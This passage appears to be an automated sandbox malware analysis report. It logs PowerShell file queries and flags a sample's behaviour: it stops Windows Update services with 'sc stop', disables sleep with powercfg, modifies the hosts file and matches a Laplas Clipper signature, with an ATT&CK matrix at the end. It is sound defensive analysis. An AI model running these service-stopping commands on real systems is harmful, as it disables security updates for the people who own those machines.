                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_0000000140001C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,42_2_0000000140001C64
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007A5A60 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_007A5A60
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007946E0 SHGetFolderPathA,GetModuleFileNameA,GetComputerNameA,GetUserNameA,6_2_007946E0
                        Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Modifies power options to not sleep / hibernate
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                        Modifies the hosts file
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Stops critical windows services
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Laplas Clipper
                        Source: Yara matchFile source: 00000023.00000002.2992259011.0000000000B4A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: svcupdater.exe PID: 7904, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation                        		11
                        DLL Side-Loading                        		1
                        Abuse Elevation Control Mechanism                        		1
                        File and Directory Permissions Modification                        		1
                        Credential API Hooking                        		1
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Native API                        		1
                        Windows Service                        		11
                        DLL Side-Loading                        		21
                        Disable or Modify Tools                        		LSASS Memory1
                        Account Discovery                        		Remote Desktop Protocol1
                        Credential API Hooking                        		21
